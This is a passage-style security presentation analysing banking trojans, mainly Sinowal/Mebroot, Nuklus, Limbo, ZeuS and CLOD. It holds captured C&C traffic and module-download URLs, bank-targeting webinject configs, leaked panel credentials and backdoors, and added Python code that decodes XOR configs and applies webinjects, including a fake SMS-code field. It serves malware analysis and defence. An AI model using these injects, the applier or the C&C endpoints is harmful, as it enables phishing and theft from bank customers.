Ibm00002.dll 10-11-2006 17:39:57 0xB000 82 Build Vasi3 2A0935310C457DD7488A417FEDCC66CE
Ibm00001.dll 14-11-2006 13:38:20 0xD200 83 Build Vasi3 EE07FCE33D6C9C43AED852CA84DF330D
Ibm00002.dll 14-11-2006 13:38:04 0xB000 83 Build Vasi3 485E44A5A98B8C3F134C8EF80D2553F7
Ibm00001.dll 19-12-2006 11:47:46 0xCE00 86 150 3B63153B213981259B399F4448B4185E
Ibm00002.dll 19-12-2006 11:46:40 0xB600 86 150 15A815346B10A692C6994293BD319F2A
Ibm00001.dll 21-12-2006 14:59:03 0xCE00 86 150 C4173660AD3B8BE13E4D29175D60ACAB
Ibm00002.dll 21-12-2006 14:58:20 0xB600 86 150 84A2AD4A0F64A0179249392FC8D1B55A
Sinowal - API functions
Malware API functions, MS Internet Explorer: InternetConnect(), HttpOpenRequest(), HttpSendRequest(), InternetReadFile(), InternetCloseHandle(), CertGetCertificateChain(), CertVerifyCertificateChainPolicy()
Mozilla: PR_Connect(), PR_Read(), PR_Write(), PR_Close()
API functions intercepted in other processes:
- Cryptography: CryptImportKey(), CryptEncrypt(), CryptDecrypt(), CryptDestroyKey(), CryptGenKey(), CryptGetUserKey(), CryptDeriveKey()
- Network: connect(), send(), recv(), WSASend(), WSARecv(), closesocket()
Sinowal -> Mebroot
Changes:
- Installation process
- MBR
- No dlls; a disk driver plus rootkit instead
- Different encryption of the communication channel to the dropzone
The phishing functions and the communication with the phishing server stay almost the same
Sinowal/mebroot - hacked (end of 2009)
POST / HTTP/1.1
Host: gduwuxci.com
Content-Length: 108
Connection: close

.]..KV.HW.2.v.?~...g...|.[2.H.-.Zb.om....v8...F......kv..............!o.......}........j...0W.."0.h.w^&.....

HTTP/1.1 200 OK
Date: Mon, 17 Nov 2008 21:18:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Set-Cookie: PHPSESSID=acaac67350d15671cc339bef5d29b2bc; path=/
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html

81
Could not connect to database 'rcmvjrjt_sope1' (localhost). Your database server may be down or your database setup may be wrong.
0
More than 300 000 uniqe banking accounts
MEBROOT - domain generation algorithm (observed output)
Mon Oct 20 2008 10:10:26 GMT+0200 ; 2008-10-19;bnigcketn.com
Tue Oct 21 2008 10:10:26 GMT+0200 ; 2008-10-19;bnigcketn.com
Wed Oct 22 2008 10:10:26 GMT+0200 ; 2008-10-19;bnigcketn.com
Thu Oct 23 2008 10:10:26 GMT+0200 ; 2008-10-17;jlgvcketn.com
Fri Oct 24 2008 10:10:26 GMT+0200 ; 2008-10-17;jlgvcketn.com
Sat Oct 25 2008 10:10:26 GMT+0200 ; 2008-10-17;jlgvcketn.com
Sun Oct 26 2008 10:10:26 GMT+0100 ; 2008-10-26;amhvcketn.com
Mon Oct 27 2008 10:10:26 GMT+0100 ; 2008-10-26;amhvcketn.com
Tue Oct 28 2008 10:10:26 GMT+0100 ; 2008-10-26;amhvcketn.com
Wed Oct 29 2008 10:10:26 GMT+0100 ; 2008-10-26;amhvcketn.com
Thu Oct 30 2008 10:10:26 GMT+0100 ; 2008-10-24;ikfjcketn.com
Fri Oct 31 2008 10:10:26 GMT+0100 ; 2008-10-24;ikfjcketn.com
Sat Nov 01 2008 10:10:26 GMT+0100 ; 2008-11-1;bov2bllev.com
Sun Nov 02 2008 10:10:26 GMT+0100 ; 2008-11-2;cpw3bllev.com
Mon Nov 03 2008 10:10:26 GMT+0100 ; 2008-11-2;cpw3bllev.com
Tue Nov 04 2008 10:10:26 GMT+0100 ; 2008-11-2;cpw3bllev.com
Wed Nov 05 2008 10:10:26 GMT+0100 ; 2008-11-2;cpw3bllev.com
Thu Nov 06 2008 10:10:26 GMT+0100 ; 2008-11-0;anu1bllev.com
Fri Nov 07 2008 10:10:26 GMT+0100 ; 2008-11-0;anu1bllev.com
Sat Nov 08 2008 10:10:26 GMT+0100 ; 2008-11-0;anu1bllev.com
Sun Nov 09 2008 10:10:26 GMT+0100 ; 2008-11-9;jwdabllev.com
Mon Nov 10 2008 10:10:26 GMT+0100 ; 2008-11-9;jwdabllev.com
Tue Nov 11 2008 10:10:26 GMT+0100 ; 2008-11-9;jwdabllev.com
Wed Nov 12 2008 10:10:26 GMT+0100 ; 2008-11-9;jwdabllev.com
Thu Nov 13 2008 10:10:26 GMT+0100 ; 2008-11-7;jcwpbllev.com
Fri Nov 14 2008 10:10:26 GMT+0100 ; 2008-11-7;jcwpbllev.com
Sat Nov 15 2008 10:10:26 GMT+0100 ; 2008-11-7;jcwpbllev.com
Sun Nov 16 2008 10:10:26 GMT+0100 ; 2008-11-16;ehbpbllev.com
Mon Nov 17 2008 10:10:26 GMT+0100 ; 2008-11-16;ehbpbllev.com
Tue Nov 18 2008 10:10:26 GMT+0100 ; 2008-11-16;ehbpbllev.com
Wed Nov 19 2008 10:10:26 GMT+0100 ; 2008-11-16;ehbpbllev.com
Thu Nov 20 2008 10:10:26 GMT+0100 ; 2008-11-14;gjddbllev.com
Wed Dec 03 2008 10:10:26 GMT+0100 ; 2008-12-0;esy1amtwe.com
Sinowal
Nuklus
- Non-encrypted communication channel to the C&C
- dll modules for IE (BHO) and Mozilla
- Injects HTTP phishing content
- Captures certificates and private keys
Nuklus modules
%SystemRoot%/IEMod.dll
%SystemRoot%/IEGrabber.dll
%SystemRoot%/IEFaker.dll
%SystemRoot%/CertGrabber.dll
%SystemRoot%/PSGrabber.dll
%SystemRoot%/FFGrabber.dll
%SystemRoot%/IEScrGrabbe.dll
%SystemRoot%/ProxyMod.dll
%SystemRoot%/ExeLoader.dll
%SystemRoot%/IETanGrabber.dll
%SystemRoot%/NetLocker.dll
%SystemRoot%/IECertGrab.dll
%SystemRoot%/IEKeyLogger.dll
%SystemRoot%/IEFileGrabber.dll
%SystemRoot%/IEInjector.dll
NUKLUS
NUKLUS vuln
/userlist.txt
/mail_log.txt
/script_log.txt
NUKLUS log monitoring
NUKLUS - sample communication
POST /pl/main.php?aa6b9ba2 HTTP/1.1
Host: 213.133.102.57
Content-Type: multipart/form-data; boundary=--__abcd-ijkl-xyz789__--
Content-Length: 200
Connection: Close

----__abcd-ijkl-xyz789__--
Content-Disposition: form-data; name="conf"

Kernel:3;
----__abcd-ijkl-xyz789__--
Content-Disposition: form-data; name="LastCommand"

----__abcd-ijkl-xyz789__----

HTTP/1.1 200 OK
http://213.133.102.57/pl/modules/browser_mon.dll
http://213.133.102.57/pl/modules/CertGrabber.dll
http://213.133.102.57/pl/modules/FFMod.dll
http://213.133.102.57/pl/modules/FTPSniffer.dll
http://213.133.102.57/pl/modules/IEMod2.dll
http://213.133.102.57/pl/modules/NetLocker.dll
http://213.133.102.57/pl/modules/ProxyMod.dll
http://213.133.102.57/pl/modules/PSGrabber.dll
http://213.133.102.57/pl/modules/SysInfo.dll
Config update…
e bancaonline.openbank.es/servlet/PProxy?app=DJ&cmd=8000
p enlaza.cajadeburgos.es/BELLogin.jsp
e cajacirculo.es/ISMC/Circulo/acceso.jsp
e bbva.es/TLBS/tlbs/jsp/esp/home/index.jsp
e extranet.banesto.es/npage/loginParticulares.htm
e banesnet.banesto.es/npage/loginEmpresas.htm
p bancopopular.es/AppBPE/servlet/servin?p_pf=c&p_id=esp&p_pm=bo&
e bancaonline.openbank.es/servlet/PProxy?cmd=8000
... and config for 8 Polish banks ...
Limbo/NetHell
- Phishing content on compromised WWW servers, or additional phishing content as WebInjects (from the config file)
- Phishing content for 67 sites: Spain 42 sites, Portugal 16 sites, Poland 9 sites
- The phishing page contains a trigger (helperred.php, a form on the phishing site)
- Encrypted communication channel (XOR)
- DB for management; logs in files
Limbo - admin panel
LIMBO - phishing site sample
Limbo - how to decode the config file and the communication channel
Limbo config inject sample
<dnsmask dns="cajamadrid.es" to="http://www.goldenolivegc.net/photos/s/es/cajamadrid/conto.php" param="Documento_s"></dnsmask>
<dnsmask dns="cajamadridempresas.es" to="http://www.goldenolivegc.net/photos/s/es/cajamadrid/conto.php" param="selopcion_s"></dnsmask>
<dnsmask dns="bancamarch" to="http://www.goldenolivegc.net/photos/s/es/bancamarch/conto.php" param="usuario"></dnsmask>
<inject url="inversis" before="name=claveUsuario></TD></TR>" what="<TR><TD class=pass> </TD> <TD class=pass>Firma</TD></TR> <TR><TD class=pass> </TD> <TD class=pass colSpan=2> <INPUT class=passtf tabIndex=3 type=password maxLength=15 size=14 value='' name=S3NT0> </TD></TR>" check="S3NT0" block="boton_ok.gif" quan="8" ></inject>
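The slide title above refers to decoding Limbo's XOR-protected config and channel, and the CLOD slide later states that XORing the first five bytes of the config gives its one-byte key. This added example (not code from the presentation or from Limbo) takes the general route that does not depend on any such header rule: it assumes a single-byte XOR key and recovers it by trying all 256 keys and keeping the one that exposes the <dnsmask>/<inject> markers and an almost entirely textual body, then lists the redirect rules from the recovered text. The plaintext is constructed from the two dnsmask entries quoted above and the key 0x5A is assumed; a captured xmd.dat would be the real input.

```python
import re

# Constructed plaintext (the page's dnsmask rules) and its single-byte XOR "encryption"
# under an assumed key; stands in for a captured xmd.dat.
SAMPLE_CONFIG = (
    b'<dnsmask dns="cajamadrid.es" to="http://www.goldenolivegc.net/photos/s/es/cajamadrid/conto.php" param="Documento_s"></dnsmask>\n'
    b'<dnsmask dns="bancamarch" to="http://www.goldenolivegc.net/photos/s/es/bancamarch/conto.php" param="usuario"></dnsmask>\n'
)
ASSUMED_KEY = 0x5A


def xor1(data, key):
    """XOR every byte with one key byte; the operation is its own inverse."""
    return bytes(b ^ key for b in data)


SAMPLE_CIPHER = xor1(SAMPLE_CONFIG, ASSUMED_KEY)

TEXT_BYTES = set(range(0x20, 0x7f)) | {0x09, 0x0a, 0x0d}
MARKERS = (b'<dnsmask', b'<inject')


def recover_key(cipher, markers=MARKERS, min_text_ratio=0.95):
    """Try all 256 keys; keep the one revealing the most config markers and an almost
    all-text body. Returns (key, plaintext), or None when nothing looks like a Limbo config."""
    best = None
    for key in range(256):
        plain = xor1(cipher, key)
        hits = sum(plain.count(m) for m in markers)
        ratio = sum(b in TEXT_BYTES for b in plain) / max(len(plain), 1)
        if best is None or (hits, ratio) > (best[0], best[1]):
            best = (hits, ratio, key, plain)
    hits, ratio, key, plain = best
    if hits == 0 or ratio < min_text_ratio:
        return None
    return key, plain


ATTR_RE = re.compile(r'(\w+)="([^"]*)"')


def dnsmask_rules(plain):
    """<dnsmask dns=... to=... param=...> entries: which bank domain is redirected where."""
    return [dict(ATTR_RE.findall(m.group(1)))
            for m in re.finditer(r'<dnsmask\b([^>]*)>', plain.decode('latin-1'))]
```

Marker hits decide first and the printable ratio only breaks ties, because a wrong key can by chance leave most bytes printable but cannot produce the eight-byte marker sequence; the ratio threshold is what rejects random data that happens to contain a marker nowhere.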
Limbo sample
http://www.kapustun.cn/datac.php?userid=18062008_100224_168171
HKEY_LOCAL_MACHINE\SOFTWARE\MRSoft
%System%\haskel32.dll (BHO, IE)
%System%\xmd.dat: encoded config file
alog.txt: captured data
cmds.txt: commands from the C&C
Specific dirs on the C&C: Zips, Sets, Logs
Limbo C&C dirs
- zips: admin panel updates (user/pass hardcoded in the file)
- sets: packed zip logs
- logs: txt files with logs (each file = one unique infected workstation)
- fls, certs, phpMyAdmin
LIMBO vulnerabilities
http://www.threatexpert.com/report.aspx?md5=53516de117adc4556621e46418113199
GET http://6arada.cn:80/rasta/connection.inc HTTP/1.0
host: 6arada.cn

HTTP/1.1 200 OK
Date: Wed, 15 Jul 2009 02:58:10 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 27 May 2009 00:21:52 GMT
ETag: "1b0337-11b-d4792800"
Accept-Ranges: bytes
Content-length: 283
Connection: close
Content-Type: text/plain; charset=koi-8
<?php
$mysql=mysql_connect('localhost','admin_admin','qwerty');
if (!$mysql) {
echo "Cannot connect to DB !";
exit;
}
$db=mysql_select_db('admin_admin');
if (!$db) {
echo "Cannot select DB Admin!";
exit;
}
?>
/zip/kk.zip
<?php
error_reporting(1);
$mysql=mysql_pconnect('localhost','hwknz_limbo','HJ3sxiHn');
if (!$mysql) { echo "Cannot connect to DB !"; exit; }
$db=mysql_select_db('hwknz_limbo');
if (!$db) { echo "Cannot select DB Admin!"; exit; }
?>
ZEUS
C&C server:
- PHP scripts
- MySQL DB: configuration and the data collected from the bots
- Admin panel
New updates (exe files) on a separate server; new configs (.bin) on a separate server
Server that provides the phishing pages; server that hosts the scripts modifying transactions on the fly
ZEUS
Components:
- C&C servers
- Phishing server with content (in some cases)
ZEUS injects malicious phishing content. Phishing types:
- Redirects to a phishing page on the phishing server
- Modifies original WWW pages on the fly
- Modifies the transaction on the fly (JavaScript framework)
ZEUS analysis
ZEUS - decoder
ZEUS - functions
Confirmed by reverse engineering:
- SOCKS v4 and v5 proxy
- Capturing screenshots, sent to the C&C
- Capturing and modifying the internet communication of applications that use the wininet.dll network API; this compromises the browser's behaviour
- Injecting HTML into the browser (webinjects)
- Launching any exe file on the remote workstation
- KillWIN and reboot
- Blocking connections to chosen hosts
- Communication channel encrypted with RC4
- Config encoded with RC4 and additional algorithms
From the bot documentation:
- Capturing POP3 and FTP credentials
- Capturing any data from TCP/IP
- Searching the workstation and uploading chosen files to the C&C
- Protected Storage dumps
- Backconnect (connecting to a host behind NAT)
- Erasing cookies
ZEUS and the Windows API
Windows API functions:
- HTTPSendRequestA
- HTTPSendRequestW
- HTTPSendRequestExA
- HTTPSendRequestExW
- InternetCloseHandleA
- InternetQueryDataAvailable
- InternetReadFile
- InternetReadFileExA
- InternetReadFileExW
- QueryInfoA
- QueryInfoW
ZEUS - cert grabbing
PFXExportCertStore: a Windows API function that exports all certificates and keys from the MS protected storage; an old function left in for compatibility with IE 4.0
It works even if the certs and keys are marked non-exportable and protected with a password
ZEUS - WebInjectShop
ZEUS
- Semi-dynamic phishing: redirects to phishing sites (7 Polish systems)
- Dynamic phishing (changes transactions on the fly): 4 Polish sites, money mules
- Dynamic phishing (SMS MiM): only one known incident, and it was a test
- Limbo vs Zeus: at the beginning the attack covered Portuguese and Spanish sites (probably the same phishing group)
- The most popular crime kit; now public (same as Limbo)
- New version 2.x with a hardware key? (currently under analysis)
ZEUS - changing payment details on the fly
- JavaScript framework
- Changes the payment details on the fly
- Checks how much money the user has on the different accounts and chooses the account with the highest balance
- The C&C sends information about the money mule and how much money will be stolen
- If the user does not verify the payment details in the SMS, it works against SMS codes as well
- Changes the account's balance history on the client side
ZEUS - Changing payment details on the fly
‘FAKTURA XXX/YY.ZZZ::Homer Money Mule::56-000::Ząbki::Mirosława Wielkiego 10::YYXXXXX0000000XXXXXXXX::30000‘;
ZEUS vulns
Some instances contain backdoors:
- Backdoor PHP code in the control panel
- Possible to create a PHP shell (tamper with the name of the file that stores the user logs, in the communication channel)
- config.php.bak (db credentials) + phpMyAdmin
- First versions: SQL injection
The malicious code adds a user "system" with the password hash "e99a18c428cb38d5f260853678922e03" (the MD5 of "abc123").
Backdoor HTML and JavaScript code in a control panel theme file: the malicious code sends the control panel address to a script placed on a hacked server, http://abacus-autos.com/cars/b.php.
Looking for ZEUS exploits in the wild (our honeypot)
- Bogus PHP scripts were created that simulated the original ZEUS admin panel (C&C)
- The domain was submitted to several public sandboxes
- Wait...
- After four days: alert! Somebody logged into our Zeus control panel :-), so we started analysing the logs. We found that an extra PHP file with a .dat extension and one .htaccess file had been uploaded.
- The .htaccess makes files with the .dat extension be interpreted as PHP.
CLOD
- ZEUS and LIMBO show the trends that other malware follows
- Hybrid, two configs: Limbo format and Zeus format
- Two Polish banks attacked (at the time of analysis)
- Configs encrypted with simple XOR (XORing the first 5 bytes of the config file gives the one-byte XOR key)
- Rootkit
- Files: chck.dat, pst.dat, ms32clod.dll
- No vulnerabilities found (during the time of analysis)
CLOD - API functions
Windows API functions:
- CreateFileW
- PFXImportCertStore
- InternetConnect
- HttpOpenRequestA
- HttpSendRequestW
- HttpSendRequestA
- InternetQueryDataAvailable
- InternetReadFile
- InternetReadFileEx
- InternetSetStatusCallback
- RegEnumValueW
- WSASend
CLOD – get account balance (zeus inject)
data_before
<p>Stan Twoich rachunków.</p></td>
data_end
data_inject
data_end
data_after
<input tabindex="10" name="btn_print_balances" type="image" src="/img/skins/2003/button-drukuj-salda.gif"
data_end
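A parser and applier for the data_before/data_inject/data_after format above, added as an example (not code from the presentation, from ZeuS or from CLOD); the Limbo <inject before=... what=...> element earlier on the page expresses the same idea. It assumes the usual ZeuS webinject semantics: set_url <mask> [flags] opens a rule, each data_* section runs to data_end, '*' is the only wildcard, and the page text between the data_before and data_after matches is replaced by data_inject, so an empty data_after inserts right after data_before, and an empty data_inject, as in the CLOD rule, brackets a region the bot reads rather than rewrites (grab_between). The first rule is the CLOD rule as shown; the second rule, the bank.example URL, the sms_tan field and both HTML pages are constructed.

```python
import re

# Constructed webinjects text: rule 1 is the CLOD balance rule (no set_url line, empty
# data_inject); rule 2 is an assumed rule of the kind that adds a fake SMS-code field.
SAMPLE_WEBINJECTS = """\
data_before
<p>Stan Twoich rachunków.</p></td>
data_end
data_inject
data_end
data_after
<input tabindex="10" name="btn_print_balances" type="image" src="/img/skins/2003/button-drukuj-salda.gif"
data_end
set_url https://bank.example/login* GP
data_before
name="password"*</td></tr>
data_end
data_inject
<tr><td>Kod SMS</td><td><input type="password" name="sms_tan"></td></tr>
data_end
data_after
data_end
"""

# Constructed pages the two rules are meant to hit.
SAMPLE_BALANCE_PAGE = (
    '<table><tr><td><p>Stan Twoich rachunków.</p></td></tr>\n'
    '<tr><td>Konto osobiste 12 345,67 PLN</td></tr></table>\n'
    '<input tabindex="10" name="btn_print_balances" type="image" src="/img/skins/2003/button-drukuj-salda.gif" />\n'
)
SAMPLE_LOGIN_PAGE = (
    '<form><table>\n'
    '<tr><td>Login</td><td><input name="login"></td></tr>\n'
    '<tr><td>Hasło</td><td><input type="password" name="password"></td></tr>\n'
    '<tr><td colspan="2"><input type="submit" value="Zaloguj"></td></tr>\n'
    '</table></form>\n'
)

SECTIONS = ('data_before', 'data_inject', 'data_after')


def parse_webinjects(text):
    """set_url <mask> [flags] starts a rule; each data_* section runs to data_end.
    Rules before any set_url (as on the slide) get the catch-all mask '*'."""
    rules, cur, section, buf = [], None, None, []
    for line in text.splitlines():
        if section:
            if line.strip() == 'data_end':
                cur[section] = '\n'.join(buf)
                section, buf = None, []
            else:
                buf.append(line)
            continue
        s = line.strip()
        if s.startswith('set_url'):
            parts = s.split(None, 2)
            cur = {'url': parts[1], 'flags': parts[2] if len(parts) > 2 else '',
                   'before': '', 'inject': '', 'after': ''}
            rules.append(cur)
        elif s in SECTIONS:
            if cur is None:
                cur = {'url': '*', 'flags': '', 'before': '', 'inject': '', 'after': ''}
                rules.append(cur)
            section = s[len('data_'):]
    return rules


def _pattern(mask):
    """'*' is the only wildcard in these masks; everything else is matched literally."""
    return '.*?'.join(re.escape(part) for part in mask.split('*'))


def url_matches(rule, url):
    return re.fullmatch(_pattern(rule['url']), url) is not None


def _locate(html, rule):
    return re.search(_pattern(rule['before']) + '(?P<mid>.*?)' + _pattern(rule['after']), html, re.S)


def grab_between(html, rule):
    """The page text bracketed by data_before/data_after (here: the balance table)."""
    m = _locate(html, rule)
    return m['mid'] if m else None


def apply_inject(html, rule):
    """Replace the bracketed region with data_inject. With an empty data_after the region
    is empty, so the payload lands right after the data_before match."""
    m = _locate(html, rule)
    if not m:
        return html, False
    return html[:m.start('mid')] + rule['inject'] + html[m.end('mid'):], True
```

Running the balance rule through apply_inject() shows why an empty data_inject is still dangerous: the bracketed balance table disappears from the rendered page, which is the same primitive the "changes balance history on the client side" bullet above relies on.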
Summary
- Any authorization function that does not link the auth code with the transaction details is vulnerable
- Even if the function is strong, e.g. SMS code or TDS, the attack can still be made if the user does not verify the transfer details during authorization on the security device (e.g. TDS token, SMS code)
- Only one main function in the malware is necessary for phishing: HTML injects
- HTML inject plugins can be used in different malware; phishing is done at the HTML/JavaScript framework level. This is the trend and the future of phishing malware
- There is no method that forces the user to verify what he signs, even with methods where the auth code is linked with the transaction details ;-(
- All methods can fail
Ideas for the future
Phishing monitoring:
- Money mule monitoring
- Monitoring changes of phishing content
- Monitoring new versions of malware
- Identification of infected customers (log correlation)
- Correlation of money flows between money mule accounts
- Gathering phishing logs
Cooperation with the largest ISPs (services for banks):
- Blackholing
- High- and low-level analysis (for risk management purposes)
- Traffic analysis
Cooperation with ISPs (end users):
- Data leakage prevention; blackholing
Tracking changes in phishing content: an automatic system that decodes the configuration files of chosen malware
QUESTIONS?